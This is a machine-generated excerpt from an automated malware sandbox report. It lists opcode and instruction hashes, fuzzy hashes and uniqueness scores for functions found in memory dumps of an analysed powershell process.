                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 924241ac7b9fd58b07114443fb2cb50234958488a40a6e460921ac9f9b984d90
                                                    • Instruction ID: 139167eb59ac2b1807bc945e53000961d6ca1bac900131af8cb20c02b8f607a7
                                                    • Opcode Fuzzy Hash: 924241ac7b9fd58b07114443fb2cb50234958488a40a6e460921ac9f9b984d90
                                                    • Instruction Fuzzy Hash: 9FE0E532B0021897CB145668D8044EE73BBEBC9261F040079D506E7740DF71DC058B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ad2960dab1a6685c52269abcb6b1af933e42b82a94077ac207bc6e49fa79b2d2
                                                    • Instruction ID: 8d49bf210ed7f0815331421880992fc919d4ae9beed8f3cf27e61a6e98d37651
                                                    • Opcode Fuzzy Hash: ad2960dab1a6685c52269abcb6b1af933e42b82a94077ac207bc6e49fa79b2d2
                                                    • Instruction Fuzzy Hash: 94E0DF35A09248AFC700CFB4A9017FA7BFADB82215F0245EBE108D7A44EA351E0487F2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d0019f9367af5efc362e803150d48e556b226bf2e5b687e7a8c6167b7305b
                                                    • Instruction ID: 5aa0aa1a1f4545ac422e2b64426abf4d79b44015f9b5c629ceda105696a09b98
                                                    • Opcode Fuzzy Hash: 4f3d0019f9367af5efc362e803150d48e556b226bf2e5b687e7a8c6167b7305b
                                                    • Instruction Fuzzy Hash: 41E0D8755092C56FC7164B78A81878EFFEADB51110F1480AAE485D3241FF305540C351
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5bd117ee4cd3e321c3b007105b15441fdc9effbb6fe19e156b129919efc26dba
                                                    • Instruction ID: 404507b1b47311aa0f6cf22d3bc3da53ba2667d168f4b588ebf7013e1687e896
                                                    • Opcode Fuzzy Hash: 5bd117ee4cd3e321c3b007105b15441fdc9effbb6fe19e156b129919efc26dba
                                                    • Instruction Fuzzy Hash: C7D0A571A001196F8B159F59D8045DEFFFFDB54120B10C075D50DD3204FF3199018740
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000016.00000002.683245759.00000000078E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_22_2_78e0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d0b0a53b015b423ffa187b90100ef2a76c475755f5515e21f19cdd910ba4c29b
                                                    • Instruction ID: 5580474a16f9982efb05f8b3244694e613ee010be2ef684a0cadb271ca36a680
                                                    • Opcode Fuzzy Hash: d0b0a53b015b423ffa187b90100ef2a76c475755f5515e21f19cdd910ba4c29b
                                                    • Instruction Fuzzy Hash: 11D01770A042089FCB00DFB4DA0475E77EAEB45208F1188A99509D7248EA315E009B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%